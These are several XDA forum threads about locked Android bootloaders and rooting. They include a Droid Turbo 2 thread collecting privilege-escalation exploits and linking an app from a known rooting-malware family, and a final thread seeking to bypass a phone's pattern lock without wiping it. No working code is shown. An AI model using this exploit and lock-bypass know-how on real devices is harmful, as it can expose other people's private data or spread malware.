Today I spotted this blog item http://blog.htc.com/2012/04/your-phone-your-thoughts-tell-us-what-you-think/ I think we should start post our concerns about not being able to gain a proper unlock.
(1) fastboot boot awesomeRecovery.img (this works because fastboot then boots recovery on the boot/temporary partition. So the you're not actually in recovery mode
(2) Offmode (this works because again you're again not technically in recovery mode. It uses the recovery ramdisk, kernel, and binaries but its still not technically recovery.
On that note I've seen suggestions that it's possibly a recovery issue with cwm and twrp. Unfortunately it doesn't appear to be the case. If it were then in CWM u wouldn't have usb when u fastboot boot the recovery or in offmode (fair assumption since both these options use the same kernel, ramdisk and binaries as recovery?). Can it be fix? Not that i know of. It looks to me like a total radio or bootloader lockout from using USB in recovery. Which means on a radio or bootloader level USB is disabled in recovery mode.
On that note I think we should raise the point to HTC that this locking down of the device does not suite our needs.Key points of fail would be as follows.
(1) Can NOT flash the boot partition from recovery. I've personally contacted HTC on this numerous times and they seem to just not care. Responding with "It's a security issue" and so forth. I would love to know how this is a security issue of any sort. Every other Android device has this ability except HTC devices since they started the HTC unlock ordeal. It's utter fail IMHO and HTC should listen to our needs .
(2) Can NOT flash recovery or boot partitions from system. This issue is NOT a deal breaker and isn't so bad when it comes down to the nitty gritty. But since the issue above exists, flashing with applications like htc dumlock and such were our only options. These work around apps cant be used to flash now because of the lockpout from system and it wouldn't be such an issue if HTC didnt lock us out in recovery from flashing boot.
(3) Can NOT flash P*IMG.zips in hboot/bootloader anymore. For the unlocked device running a custom firmware this is a must. Specially when radio updates and such are needed from the OEM. We seen a big use of this on the Sensation when HTC updated the device from Gingerbread to Ice Cream Sandwich. The update required new hboots, radios, and partitioning to actually use. So in that instead of having to flash a RUU Which didn't exist the only choice was to flash a custom P*IMG.zip that included all the radios and images need to run the builds. At this point we can't update those image/partitions without flashing an RUU. This makes no since and doesn't seem to do anything but make things more difficult on the unlocker to customize and modify their device.
(4) If all the conditions above HAVE to exist. Then why not give us documentation or utilities to flash fimware.zips from recovery like HTC does? When HTC was the proud Nexus device there was full support and documentation available on how to flash firmware on their devices. This made anyone choosing an HTC device blessed with knowing that their device was not only open and unlocked, but when flashing firmware that it was being flashed correctly to Google and HTC's standards. This code has now been moved out of recovery since right before the move to edify scripting and moved to vendor/htc/ (not arguing this choice as thats where it belongs from a maintaining point of view). But the problem is that vendor/htc is proprietary now. Which means Documentation and support for flashing firmware correctly is not available and left to developers of recoveries for the community to figure out. One would think if HTC was standing behind us that they would step up and give us a PROPER/OPEN/REAL unlock, or if they cant for the lame excuse of security concerns, then give us the documentation and utilities to flash the boot and firmware partitions properly. I mean really... what is there to lose there?
(5) WHAT WAS THE POINT OF HTC UNLOCK? It was to reach out and accept us as a community. It was to keep us from having to exploit their firmware and look for holes to gain control of a device we rightfully own. WHAT DID HTC UNLOCK DO? It unlocked the devices at first and with each new revision of the unlock it gets more locked down and harder for us to use it as intended. WHAT DOES THAT LEAD TO? It leads to us hoping someone will take the time out of their life and exploit HTC's firmware so we can have access and control of our devices. I mean, it's bad when u have people poking a device with a paperclip to get a device unlocked to avoid a official unlock.
Bottom line; I'm personally fed up with HTC's unlock. It's absolute crap! It does not serve the purpose it was intended and only makes things harder then they were before. As a devoted HTC customer it has me questioning if my next device will be an HTC. With all the other options that would allow me to spend less time trying to gain proper access to my device and more time actually having fun with it, why choose HTC? Everyone else is shying away for these same issues. Everyone with an HTC unlocked device waits for someone to exploit HTC's firmware and give them a proper unlock. Why not just choose a device without the locked down/unlock instead? IDK but HTC needs to step up and listen to us. Every HTC forum with an HTC Unlock is screaming for these issues to be fixed.
My call to HTC is to fix these issue and/or give us proper documentation on flashing firmware to our devices via custom recoveries. The boot flashing lockout is dumb, pointless, and in NO WAY a security threat AT ALL and is nothing more then a CRAP RESPONSE to something that they sould be working to correct, instead of ignoring. In the end its hurting HTC's relations with developers and is ultimately doing the opposite of what it's original intent.
HTC, PLEASE READ AND LISTEN!!!11ONEone
To everyone else, SPREAD THE WORD!!!ONEone
This is the future of HTC unlock and each new device it gets worse. Maybe HTC will listen and address these issues, then again maybe we will just need to find another OEM that supports us and does listen
Click to expand...
Click to collapse
From this thread : http://forum.xda-developers.com/showpost.php?p=25407373&postcount=19
I have posted the same in Facebook Page and Tweeted it. I think we should be more aggressive.
what about groubal?
Posted anyway :s
"There has been overwhelmingly customer feedback that people want access to open bootloaders on HTC phones. I want you to know that we've listened. Today, I'm confirming we will no longer be locking the bootloaders on our devices. Thanks for your passion, support and patience," Peter Chou, CEO of HTC
Please S-Off your devices as promised, your unlock is not a true unlock and it is still heavily restricted. We can't flash official RUUs in this weak htc-dev unlocked state! Please fulfil your promise!
You have some valid points, but you do realise us tinkerers aren't htc's only customers right? Most businessmen now use smartphones like the one X and they certainly do not fiddle with their phones, nor do they accept that their phone comes with serious security flaws potentially opening their device up to strangers or corporate espionage. This point, however, could be used both for and against this fact. For example, if HTC officially provided S-OFF via htcdev then they could avoid people developing exploits for their device while also causing the device to be factory reset when it is applied. The downside of this is their products could get a reputation for being unstable or whatever (people seeing my device for example, and getting the idea that all one X's are on the verge of exploding)
That doesn't seem to be an issue for Google or Samsung, so I don't think its a really valid point.
Rekoil said:
You have some valid points, but you do realise us tinkerers aren't htc's only customers right? Most businessmen now use smartphones like the one X and they certainly do not fiddle with their phones, nor do they accept that their phone comes with serious security flaws potentially opening their device up to strangers or corporate espionage. This point, however, could be used both for and against this fact. For example, if HTC officially provided S-OFF via htcdev then they could avoid people developing exploits for their device while also causing the device to be factory reset when it is applied. The downside of this is their products could get a reputation for being unstable or whatever (people seeing my device for example, and getting the idea that all one X's are on the verge of exploding)
Click to expand...
Click to collapse
I understand mate .. That's why the S-OFF should be optional. I personally working in a co-operate enviorment most of the them won't go for Android since our enterprise applcation doesn't work well (Like deployment of software apps etc.) most of them prefer Blackberry for Windows based phone. That's why Windows 8 phone comes with secure boot and large scale application deployment with same tools used in Windows so they can convert the remaining BB users to Windows. Android has a long way to get attention from enterprise users. For now think it's an entertainment OS. Sony went a long way in this case they allow complete unlock even help FreeXperiaTeam with development of CM. Sooner or later our devs will find a way to S-OFF why not HTC offer it proactively and creative a good will against devs like Sony did.
S-off on any HTC phone do not I repeat do not open any other security issue ie a business would not leave such possibility open some business develop there own software for phones etc and still do they was doing it with the old pda phones and HTC pda phones with HTC to stop locking there phones allows this option again to a business.
A business wouldn't leave a device open as they would lock them there selfs via encryption etc so people arguing over its opening security holes is an invalid point other devices are open ie Samsung etc so why not HTC all other HTC that have been exploited to allow the same hasn't broken any security regarding networks or the ability to change serials etc as this info is on a write once chip and can not be over written like some other devices in past
The reply from HTC ceo has just made my day it's great news I just hope it true to the word
And believe it or not there loads of corporate business are using android devices to its full existent well here in the uk they are as its such a powerful operating system and not just for entertainment I speak from experience I use my phone for business and use a lot of business apps etc so my phone is not just for entertainment purposes etc
Everyone's concern over security is a fair statement but not valid reason not to unlock and am glad to hear HTC agree now.
Sent from my HTC One X using xda app-developers app
@dryan433: Dude, what are you talking about? Have you ever heard about something called punctuation or capital letters?
Sent from my HTC One X using xda app-developers app
Related
I've been wondering about this for a while...
Can anyone tell me WHY we should be forced to root our phones to gain full access to them? Surely the action of locking down these phones so that we have to hack them goes completely against the entire point of Android?
Speaking as a user who will probably root his phone (and who has rooted other phones in the past), it does make sense for phone manufacturers/networks to not provide easily hackable phones for several reasons:
1). The reason you don't have root by default is that it makes it very very easy for a malicious program to do nasty things. The same reason why I don't log in as root to my linux servers unless it's absolutely required - i can accidentally (or intentionally) do stupid things as root that I could not do as a normal user
2). HTC provides a warranty for the phone. Easy access to root would lead to (again) doing silly things llike flashing a bad radio and bricking the phone...leading to HTC having to replace the phone
Speaking as someone who rooted his Magic, I find that I have had no need to root my Desire as of yet (the main reason the Magic was rooted was to install a custom recovery so that I could flash unsigned ROMs to get Android 2.x or Sense on my Magic, both of which I already have on the Desire).
John
I can understand reasonable restrictions, but I really can't fathom the reason why they try so damned hard to stop us customizing our devices.
They should make an app for it, but make damned sure that the user is told that IF they unlock root access, they'll invalidate their warranty.
It's mostly so HTC and the carriers won't have to answer thousands of support request from clueless owners who installed a app which ruins the OS.
You see, root access literally means "full access permissions", that means you can actually delete everything on the phone, including system files. Couple this degree of access with a marketplace like Android has and you soon have a real mess (when apps screw up or someone programs a virus app).
From an HTC point of view, I think it shouldn't be possible for anyone to mess up their phone to the point it becomes unusable. That's why there is no root support on the devices.
As for leaving the experienced user the choice: Do you actually think any normal user reads the part where it says "voids your warranty"? They'll go crying to HTC if something goes wrong and blog about how crappy and slow their phone (with root) is, while HTC have absolutely no control over the user experience.
The reasons why I rooted my Hero:
1. Flash a 2.1 rom.
2. Use Market Enabler to show paid applications in the Market. (I don't understand why this is disabled in some countries, when I'm allowed to create a Google Checkout account.)
3. Enable APS2SD. (It bugs me that even though Android doesn't allow installing apps on the SD card till now, high-end phones (AKA Desire) are still made with a 512MB ROM)
salahag said:
The reasons why I rooted my Hero:
1. Flash a 2.1 rom.
2. Use Market Enabler to show paid applications in the Market. (I don't understand why this is disabled in some countries, when I'm allowed to create a Google Checkout account.)
3. Enable APS2SD. (It bugs me that even though Android doesn't allow installing apps on the SD card till now, high-end phones (AKA Desire) are still made with a 512MB ROM)
Click to expand...
Click to collapse
I'm not asking why people have rooted, I'm asking why we should HAVE too. Things like APS2SD are perfectly legitimate reasons to need root access, and we shouldn't have to be forced to invalidate our warranty just to get some functionality that Google haven't implemented in their OS yet.
FloatingFatMan said:
I'm not asking why people have rooted, I'm asking why we should HAVE too. Things like APS2SD are perfectly legitimate reasons to need root access, and we shouldn't have to be forced to invalidate our warranty just to get some functionality that Google haven't implemented in their OS yet.
Click to expand...
Click to collapse
well at least its one up from an iphone! i mean seriously at first you had to "jailbreak" to get coppy and paste, and thats just one example.
Hello and greetings to all, this is my first XDA post so please be gentle with me...
I recently started pondering one of the problem's I see a lot of people surfing these Forums suffering from, the dreaded "Bricked Device"
For whatever reason generally through no fault of your own, you may end up with a bad flash that results in your device becoming a worthless but very expensive paperweight. :crying:
Some examples of people suffering a bricked device:
http://forum.xda-developers.com/showthread.php?t=2229416
http://forum.xda-developers.com/showthread.php?t=2275035
http://forum.xda-developers.com/showthread.php?t=1926098
After doing a lot of research myself from suffering something similar I started to notice the general theme is always the same, people saying "wait for the device manufacturer to release the NVFlash!"
However in these instances shown above the RETAILER in question is ASUS and they are never going to release any kind of source, to any kind of NVFlash.. Because if they did, you have to reflect that would put them out of buisness, it's far more lucrative for the RETAILER (not the manufacturer) to just sit back and wait till you've got a problem with a shody update and then push selling you a new motherboard for your device. A new motherboard that in all likelyhood you dont even need and if you send in the device for repair that you would probably never even see being placed into the device in the first place when all they have to do is fix your broken bootloader.
Because the reality is, the Manufacturer being "TEXA'S INSTRUMENTS" have already made the full source of the NAND Flash to these devices readily available to the RETAILER and there partners in buisness.
It may surprise you and a lot of other people to learn that in fact you can already download The Official TEXAS INSTRUMENTS FLASH TOOL Ver: 1.6.0.0 from the following link: http://www.ti.com/tool/flashtool
Complete with the entire walkthrough guide available here: http://processors.wiki.ti.com/index.php/Flash_v1.6_User_Guide
I know there are a lot of people out there on this forum that have been looking for this tool so I decided I would make my first post a link to the Bootloader Reflashing Tool for the majority of all ARM or OMAP based devices.
Please dont ask me how it work's, I'm happy to sit back and let those out there with more experiance in these matters take the plunge for themselves if it means in the long run we can all finally put Linux onto the Android Touch device with relative ease and recover from stupidness such as a Bricked device because of a crappy bootloader update where the RETAILER decides in there infinate wisdom to remove USB device support from the Jelly Bean Bootloader...
On the plus side, this means that in the near future when the right people get there hands on this tool (from the Manufacturer) we can all expect to see some far more funky flashing startup screens and some rad custom bootloaders :victory:
Thank you for taking the time to read my first post...
P.S: I also nearly forgot to mention this is the tool that LOCKS and UNLOCKS the Bootloader, so once people start making Bootflashes for there device to use with this tool then you wont see "Your Device is Unlocked" in your face everytime you turn on the device! (I wonder if that means we can recover our warranty, I can almost hear ASUS sqweak in protest!)
REALY Nobody knows to work with this tool ???
REALY????
I dont belive this....
I have TF300TG briked... I I want to TRY any solution...!!!!
BR
Mihnea
This thread is intended for the Droid Turbo 2. For the lucky Moto X Force owners, this thread shouldn't apply to you.
I think there are some brilliant minds lurking on this forum and I'm hoping there could be some research done to "encourage" the possibility of attaining root and boot loader access on our Droid Turbo 2 Devices.
My approach here is to establish a collection of "Zero Day Bugs". Security flaws found in our devices that would put our OS as risk. As far as I can tell, Google keeps a record database and the media likes to talk about zero-day discoveries. Of course these bugs need to be timely so zero-day flaws found in 2014 or early 2015 likely were patched with the launch of the DT2.
For example, below is a link to a Zero-Day exploit that elevates the privileges of an app. Can something like this be used? Who has the technical expertise to replicate such an exploit? This thread is to talk about these things.
http://perception-point.io/2016/01/...f-a-linux-kernel-vulnerability-cve-2016-0728/
Hopefully this will spur up some traction and help get us root and bootloader.
Exploit found for Turbo 2 that can grant root access
Given the widespread impact of this exploit, it is likely other device owners are going to try to implement this exploit as well. Please post here if you find any implementations for other devices as it may be usable for the Turbo 2.
It has been confirmed that Quadrooter can exploit the Turbo 2: http://www.zdnet.com/article/quadrooter-security-flaws-affect-over-900-million-android-phones/
Four vulnerabilities (CVE-2016-2059, CVE-2016-2504, CVE-2016-2503, CVE-2016-5340)
And just an FYI:
"ALLOW OEM UNLOCKING" DOES NOTHING ON THE DROID TURBO 2
Click to expand...
Click to collapse
windraver said:
This thread is intended for the Droid Turbo 2. For the lucky Moto X Force owners, this thread shouldn't apply to you.
I think there are some brilliant minds lurking on this forum and I'm hoping there could be some research done to "encourage" the possibility of attaining root and boot loader access on our Droid Turbo 2 Devices.
My approach here is to establish a collection of "Zero Day Bugs". Security flaws found in our devices that would put our OS as risk. As far as I can tell, Google keeps a record database and the media likes to talk about zero-day discoveries. Of course these bugs need to be timely so zero-day flaws found in 2014 or early 2015 likely were patched with the launch of the DT2.
For example, below is a link to a Zero-Day exploit that elevates the privileges of an app. Can something like this be used? Who has the technical expertise to replicate such an exploit? This thread is to talk about these things.
http://perception-point.io/2016/01/...f-a-linux-kernel-vulnerability-cve-2016-0728/
Hopefully this will spur up some traction and help get us root and bootloader.
Click to expand...
Click to collapse
Could be used on a Terminal Simulator and get the bootloader lock transistor to break safety.
But honestly, my first thought would be to force into QHSUSB_DLOAD and somehow inject all XT1580 stuff to get it recognized as such.
I have installed one-click root (I got it through another site, not from them) and it sometimes says failed to root, but other times, it goes through the process, says it's done and to reboot, but when rebooting it does not have root. I have tried running other apps, like King Root, or Root Genius, or half a dozen others to get it to root, after getting one-click to say it has rooted it. Not sure if this will help or not, and honestly, I'm to the point, I'm ready to give up and do something different. I WILL NEVER buy another Verizon phone, ever! I may not drop them as a carrier, but I wont be keeping their crappy locked junk.
brannonwj said:
rant
Click to expand...
Click to collapse
From what I understand, this thread is for brainstorming. Not ranting about how you didn't do your research.
not a rant
Techn0Luigi said:
From what I understand, this thread is for brainstorming. Not ranting about how you didn't do your research.
Click to expand...
Click to collapse
That wasn't a rant about how I didn't do any research. IT was a what I did that might lead to someone having an idea of how it might help.
Don't be a jerk.
mr_verystock said:
Could be used on a Terminal Simulator and get the bootloader lock transistor to break safety.
But honestly, my first thought would be to force into QHSUSB_DLOAD and somehow inject all XT1580 stuff to get it recognized as such.
Click to expand...
Click to collapse
Can you explain the QHSUSB_DLOAD more?
QHSUSB_DLOAD (Qualcomm High-Speed USB Download Mode)
Man... It's been a while. Haven't had fun with any of this.
The bootloader starts and checks everything. There are 3 stages of the bootloader. 1 starts TZ, 2 something else, by 3 everything is booted and then it loads fastboot. QHSUSB_DLOAD is baked into the hardware. If the bootloader file is missing (.sbn) or doesn't match magic key (.hex) then booting fails. Most of the stuff turn off except for the CPU (in this case, ARM Cortex A53 and A78) and communications (USB interface), and it is stuck at QHSUSB_DLOAD. From there, you can load anything raw into the phone. So you can bring over the partitions that is used to boot (so in this case, you may be able to bring over something that damages TZ transistor, thereby unlocking bootloader). What you bring over exactly for the bootloader unlock, it hasn't been discovered even with the original Moto X (2013). However, that's how root is done. Bring over the blocks of the OS that contains the root blocks, and the bootloader doesn't know a thing.
Bring over a valid .sbn and .hex file and forcing the phone CPU to reset would bring the phone back from the missing bootloader, and then fastboot loads, followed by the OS (if the Linux core is present, the boot sector there, but that's another topic).
They rooted the phone in China , they sell it rooted!! Here is the link
m.intl.taobao.com/detail/detail.html?id=521809261322&spm=0.0.0.0
mr_verystock said:
QHSUSB_DLOAD (Qualcomm High-Speed USB Download Mode)
Man... It's been a while. Haven't had fun with any of this.
The bootloader starts and checks everything. There are 3 stages of the bootloader. 1 starts TZ, 2 something else, by 3 everything is booted and then it loads fastboot. QHSUSB_DLOAD is baked into the hardware. If the bootloader file is missing (.sbn) or doesn't match magic key (.hex) then booting fails. Most of the stuff turn off except for the CPU (in this case, ARM Cortex A53 and A78) and communications (USB interface), and it is stuck at QHSUSB_DLOAD. From there, you can load anything raw into the phone. So you can bring over the partitions that is used to boot (so in this case, you may be able to bring over something that damages TZ transistor, thereby unlocking bootloader). What you bring over exactly for the bootloader unlock, it hasn't been discovered even with the original Moto X (2013). However, that's how root is done. Bring over the blocks of the OS that contains the root blocks, and the bootloader doesn't know a thing.
Bring over a valid .sbn and .hex file and forcing the phone CPU to reset would bring the phone back from the missing bootloader, and then fastboot loads, followed by the OS (if the Linux core is present, the boot sector there, but that's another topic).
Click to expand...
Click to collapse
I'd like to see a Verizon phone rooted. That is the version I have and most in the U.S. have as well.
Sent from my XT1585 using Tapatalk
I finally updated my Turbo 2, losing hope on a root exploit.
Then I read this.
http arstechnica dot com/security/2016/06/godless-apps-some-found-in-google-play-root-90-of-android-phones (sorry, longtime lurker, just registered, can't post links)
It might lead to nothing, but maybe for those who haven't updated an exploit can be found with the godless apps?
The godless app is a hack that steals your data. If it did work, (which from what I understand it only works on 5.1 and below) you'd risk your personal and financial data being stolen and sold.
Alaadragonfire said:
They rooted the phone in China , they sell it rooted!! Here is the link
m.intl.taobao.com/detail/detail.html?id=521809261322&spm=0.0.0.0
Click to expand...
Click to collapse
Any luck in contacting the seller on how it is rooted?
I'm sure they use stolen Lenovo/Motorola factory development "engineering" software which unlocks the bootloader. It's the same phone as the Moto X Force but with locked down bootloader.
There were similar Droid Turbo phones being sold with unlocked bootloader a year ago in China, months before the Sunshine exploit was found.
gizzardgulpe said:
I finally updated my Turbo 2, losing hope on a root exploit.
Then I read this.
http arstechnica dot com/security/2016/06/godless-apps-some-found-in-google-play-root-90-of-android-phones (sorry, longtime lurker, just registered, can't post links)
It might lead to nothing, but maybe for those who haven't updated an exploit can be found with the godless apps?
Click to expand...
Click to collapse
I dont have my dt2 but link to one of the apps in case someone wants to try
https://apkpure.com/summer-flashlight/com.foresight.free.flashlight?hl=en
I'm usually just lurking here and grab Roms and exploits when they pop up, but I have something to add. Has anyone unlocked the developer settings? There's a toggle named 'oem unlocking' with a subtext of 'allow the bootloader to be unlocked'. Does this mean the bootloader can be unlocked? Last Verizon phone I had was a g3 and only way to gain a faux unlock was to use 'bump' to install twrp. Could this be possible with the turbo 2? I'm not a coder or anything, but just trying to add to the think tank here
This setting does nothing.
damkol said:
This setting does nothing.
Click to expand...
Click to collapse
There really should be a sticky saying "ALLOW OEM UNLOCKING DOES NOTHING ON THE DT2"
Droid turbo 2
After spending countless hours trying to unlock my bootloader to root my phone I'm at an impasse I've been told the Verizon and at&t models arnt able to be unlocked I will keep trying to get around this to root and install custom roms if anyone has any tips
Rhydenallnight said:
After spending countless hours trying to unlock my bootloader to root my phone I'm at an impasse I've been told the Verizon and at&t models arnt able to be unlocked I will keep trying to get around this to root and install custom roms if anyone has any tips
Click to expand...
Click to collapse
Crack the case, hook up some leads (microscope) and dump the memory for the boot loader is the only thing I can think of. Don't know if the that is even possible with that memory. It's probably integrated with other stuff.
Sent from my XT1585 using Tapatalk
Update: Oh yeah, it's encrypted. Guess that won't work.
Found something. Does anyone know if this vulnerability exists on the Droid Turbo 2?
CVE-2015-1805
http://www.computerworld.com/articl...itical-android-root-vulnerability-itbwcw.html
There is a proof of concept out there. Has anyone tried it?
https://github.com/dosomder/iovyroot
Hi,
My wife HTC m9(UK, Vodaphone, latest stock ROM, No root) was turned off last night to charge.
When booted up it does the below. It does not load into the OS. Every boot loops into the below.
https://drive.google.com/file/d/0B8n21CQX7535cjF4MnZqV2E1dGM/view?usp=sharing
It says the software has been modified?
My wife was very insistent that I never root or change ROMS on her phone.
Does anyone have a fix or is this send off for replacement?
Any advice would be greatly appreciated.
Thanks
Ca1v
ca1v said:
Hi,
My wife HTC m9(UK, Vodaphone, latest stock ROM, No root) was turned off last night to charge.
When booted up it does the below. It does not load into the OS. Every boot loops into the below.
https://drive.google.com/file/d/0B8n21CQX7535cjF4MnZqV2E1dGM/view?usp=sharing
It says the software has been modified?
My wife was very insistent that I never root or change ROMS on her phone.
Does anyone have a fix or is this send off for replacement?
Any advice would be greatly appreciated.
Thanks
Ca1v
Click to expand...
Click to collapse
What happens if you try to boot to Download Mode? I guess you see the black screen that is mentioned in Q7, right? If that's the case there isn't much you can do...
Download mode seems to be working (https://drive.google.com/file/d/0B8n21CQX7535cEFhTlpnajF5anM/view?usp=sharing)
If this is the case, can you point me in the right direction to get resolved?
Many thanks for the help
Flippy498 said:
What happens if you try to boot to Download Mode? I guess you see the black screen that is mentioned in Q7, right? If that's the case there isn't much you can do...
Click to expand...
Click to collapse
Download mode seems to be working (https://drive.google.com/file/d/0B8n...ew?usp=sharing)
If this is the case, can you point me in the right direction to get resolved?
Many thanks for the help
Interesting. Your video in post 1 shows a security warning. That means that the OS got deleted. This is only possible if you unlock the bootloader and delete it manually via TWRP or if the EMMC gets broken. Since the phone's S-ON and its bootloader is locked and not unlocked or relocked I assumed that the latter happened*.
As long as the download mode is working you can restore the system with the help of a RUU. Instructions can be found in the thread I linked in my last post. Be aware that all data on the phone is going to get erased.
* Well, it is possible to get the phone's status back to S-ON and locked with S-OFF but you said you never tinkered with that phone...
Flippy498 said:
Interesting. Your video in post 1 shows a security warning. That means that the OS got deleted. This is only possible if you unlock the bootloader and delete it manually via TWRP or if the EMMC gets broken. Since the phone's S-ON and its bootloader is locked and not unlocked or relocked I assumed that the latter happened*.
As long as the download mode is working you can restore the system with the help of a RUU. Instructions can be found in the thread I linked in my last post. Be aware that all data on the phone is going to get erased.
* Well, it is possible to get the phone's status back to S-ON and locked with S-OFF but you said you never tinkered with that phone...
Click to expand...
Click to collapse
Just thought I'd bring to your attention that apps are now being written that will try to obtain root without you knowing. The reason is that they can steal any information they want and sell it to corporations for as little as 4 pence/6c a record.
It is possible that it is a failed root by an app.
"I'm safe, I only download my apps from google playstore" - nope, you're not.
"I only use signed apps and the checksum is always correct" - nope, checksum can be matched with padding.
"I only use external sources to update genuine apps" - nope, see the Google playstore comment above.
"I have all my security and privacy set to super strict, I have my apps verified by google" - nope, still not secure because alerts are only written when the malicious/bad code is found.
Be warned, my fellow xda'ers. There is a whole new breed of security breach and it is terminal to root as a whole. Apps like kingoroot etc are issuing the wrong type of people with the wrong type of information and they are using it for the wrong purposes.
Google will stuggle to put a lid on these types of apps because they attack the hardware for access to software (a simple memory buffer overflow attack), inject a few lines of code and you're in, permanently. It will eventually result in a total lockdown at the manufacturer and bye bye root access, roms, mods etc, you'll get what you're given.
How do we prevent this?. We don't and we can't. We just have to sit back and watch as the world takes our privacy while bricking our devices one by one just to "try" to earn a poxy 4p.
Beamed in by telepathy.
@shivadow: I'm actually not sure what you're trying to achieve with your post. Malicious apps that can root your device without letting the user know about that exist since several years now. (Click here for a random example from 2011) Smartphones aren't completely safe and they never were. Everyone who's claiming the opposite either doesn't know what he/she is talking about or is simply lying.
To name just a few more android security flaws/exploits that emerged in the past: rageagainstthecage, gingerbreak, heartbleed, stagefright, the master key vulnerability, the futex bug, rootnik...
All of these have more or less been used for manipulating android phones. There is no absolute security. Android is still as secure/insecure as it's always been.
In addition, several OEMs are already trying to prevent their customers from rooting their phones since several years. Samsung's KNOX is a perfect example. (I don't want to discuss whether they're successful. That's a whole different topic.)
But let's get back to the deleted OS of the OP's phone: I've never heard about failed root attempts that erase a complete system partition. Therefore, I highly doubt that a malicious app caused all the trouble. Failed root attempts may cause a bootloop but they don't wipe your phone. Just think about the following: How should the dev of such app gain money if the app deletes OSes? Without OS there is no information you can steel and if you have no information you could sell/abuse/whatsoever you don't gain any money. Oh and not to forget that most apps on the play store already collect more than enough data from your phone they can sell afterwards without having to root it.
I meant failed root could be the cause, if the op didn't then who did?. If no-one modded it then dead nand is the only player..
I agree with every thing else but I don't trust those apps that try to gain root in the background to steal data and I think it's too easy for them to bugger your phone just for the sake of making a few coins. Face it, if I was doing it, once I had what I wanted I wouldn't care about the device. Sod the gracious exit and all that jazz.. No evidence, no conviction.
Maybe I'm being ott but my questions and points are still valid.
This is a proper "who dunnit" because I doubt it died of its own accord.
Knox is for businesses btw. If knox is triggered, which is very easy to do, the business is advised not to buy the device as it "may" have been compromised. But if no company secrets are being held on the device then it's still good to use. Knox protection was counteracted by supersu. In a nutshell, unless you run a company knox is of no concern to the everyday user.
Just thought I'd chuck that in there, I'm versed in the arts of the s3 i9300. I moved from that phone to this m9.
Beamed in by telepathy.
Hi
I'm new to the forum but have been doing a fair amount of research. I am stuck now though and would like a bit of help.
My situation is that I have a Xperia XA1 ultra (I know I should post in that device specific forum but not much seems to be happening there) I have a very specific problem that I have treated like a forensics problem.
The phone is locked by a pattern which has been guessed by another person so many times that the gatekeeper only allows one entry per day provided the phone is charged otherwise the timer resets.
It has not been rooted and ADB is disabled.
I have connected to it through fastboot and what I can gather is that it is running Android Oreo.
The system details are as follows:
Product: XA1 Ultra G3221
Build Number: 48.1.A.0.129
Chipset: Mediatek MT6757 Helio P20
Bootloader: Locked
My research has led me to the possibility of loading a recovery image into the RAM of the phone and accessing ADB that way. I tried this with a TWRP image but obviously it didn't work. There is a company called Cellebrite that claims to be able to load it's own boot/recovery image into the bootloader and gain entry that way, however the license is something like £10,000. I'm definitely not a commercial customer.
The final option for me would be to dump the memory via JTAG or chipoff, the contents would be encrypted but I found a blog where somebody had managed to find the location of the gesture.key file while the system was encrypted. I can't remember what the site was called though, it took me ages to find last time.
My main questions are does Sony sign the boot image with it's own keys or does it use the standard Android Verified Boot?
Does Sony reuse the same keys for signing across devices? Likely not but maybe
Is there a way to send specific instructions to the RAM via fastboot?
Does anybody know of an exploit that could be used?
Is there a way to extract the boot.img and recover the Sony keys?
If there any other docs, resources or ways to get the data that could help, I will gladly read and/or try them. I think this forum is probably the biggest resource one though but after a while the specific information needed gets harder to find.
The main thing is that I don't unlock the bootloader and flash anything. It's all got to be live and non data damaging.
I tried MTPwn on the off chance that it would work but nope, it was a no go.
If there was a way to utilise the mediatek exploit to gain entry from fastboot that would be excellent, or to use fastboot to dump the memory.
Thanks for reading, I hope someone can help.
Your thread was quite confusing at first as I wasn't sure what to look for exactly :/
That being said, you have your phone locked and you want to unlock it. However you don't want to flash or reset your device, you don't have root permission, you don't have debugger mode on and you don't want to unlock the bootloader, correct?
Basically you're asking for the impossible...
All I can think of is FROST attack. See article for details and source code.
You can also send your device to your nearest Sony service center and they can probably fix it with no memory loss.
Other than that, you MUST hard reset your phone if you want it back.
However should you come to your mind and realize the reality of the situation where you shouldn't be picky about it then you can start with flashing custom recovery. Or using third-party programs like dr.fone.
XDHx86 said:
Your thread was quite confusing at first as I wasn't sure what to look for exactly :/
That being said, you have your phone locked and you want to unlock it. However you don't want to flash or reset your device, you don't have root permission, you don't have debugger mode on and you don't want to unlock the bootloader, correct?
Basically you're asking for the impossible...
All I can think of is FROST attack. See article for details and source code.
You can also send your device to your nearest Sony service center and they can probably fix it with no memory loss.
Other than that, you MUST hard reset your phone if you want it back.
However should you come to your mind and realize the reality of the situation where you shouldn't be picky about it then you can start with flashing custom recovery. Or using third-party programs like dr.fone.
Click to expand...
Click to collapse
Thanks for getting back to me, yes I realise it is asking for the impossible. I'll have a research around that article and see if I can find some information on how to write the program to dump the contents over USB. I tried Dr Fone but that only gave me the option of a hard reset.
My current line of attack is an exploit over USB called OATmeal, whereby a Raspberry Pi is used over OTG with a filesystem label of "../../data", it allows the filesystem of the phone to be mounted and data written off. It is a little complex and so I am struggling a bit with getting it to work. The team over at Project Zero have a good write-up of it so I'm following that and the POC at exploit-db to guide me through it.
I think I will be able to get the USB part to work but I'm not sure if I have to write a Java file to automatically run when /data is mounted, or if that's even possible.
Forenzo said:
My current line of attack is an exploit over USB called OATmeal
Click to expand...
Click to collapse
Not to make you frustrated, but this is an old exploit and I highly doubt it'd work on your device, unless your device security patch is older than 9-2018.
And you can't rollback on your security patch.
You should really consider flashing TWRP or other custom recovery. You have no other option.
XDHx86 said:
Not to make you frustrated, but this is an old exploit and I highly doubt it'd work on your device, unless your device security patch is older than 9-2018.
And you can't rollback on your security patch.
You should really consider flashing TWRP or other custom recovery. You have no other option.
Click to expand...
Click to collapse
Fortunately the device hasn't been updated since around 2-2018 or 3-2018 so any exploit I can find from then onwards that I can use will be great. I really do get that the only realistic option is to unlock the bootloader and flash the recovery but the data needs to be recovered and I absolutely don't want to wipe it.
If I can't do it then it will gather dust until the end of time...
It seems that no matter what I say you won't realize the situation you are in.
I can only suggest to NEVER mess with the phone circuits or the motherboard. No matter which stupid yoututbe tutorial you saw. Those guys are douchebags who only know how to get views and don't care for whatever you/they do to your device.
Needless to say messing with the circuits or the motherboard require dexterity and experience which I'm positive you don't have.
As I said before if you send it to an authorized service center, then they can help you with it without memory loss.
Sending you device to a service center isn't an insult or an act of low self esteem. Service centers exist for a reason, and they're basically geeks who are too passionate about electronics and decided to make a living out of it.
Or maybe you can somehow use the EDL mode on the phone.
In Qualcomm devices the EDL mode is locked and can only be accessed by an authorized person who have the security code of your device. I don't know if it even exist in MTK devices.
